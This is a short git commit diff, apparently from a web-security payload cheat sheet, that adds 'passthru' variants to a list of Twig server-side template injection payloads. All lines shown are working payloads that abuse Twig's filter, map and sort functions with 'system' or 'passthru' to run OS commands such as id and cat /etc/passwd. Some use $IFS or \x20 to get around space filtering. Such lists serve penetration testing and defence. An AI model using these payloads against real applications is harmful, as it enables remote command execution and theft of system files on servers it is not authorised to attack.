Added 'passthru' filter exploits

This commit is contained in:
Tom Wilford 2023-04-28 14:47:59 +01:00 committed by GitHub
parent 1e66a42bba
commit c1dc141e13
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -966,6 +966,8 @@ $output = $twig > render (
{{['id',1]|sort('system')|join}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}}
{{['id']|map('passthru')}}
```
Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)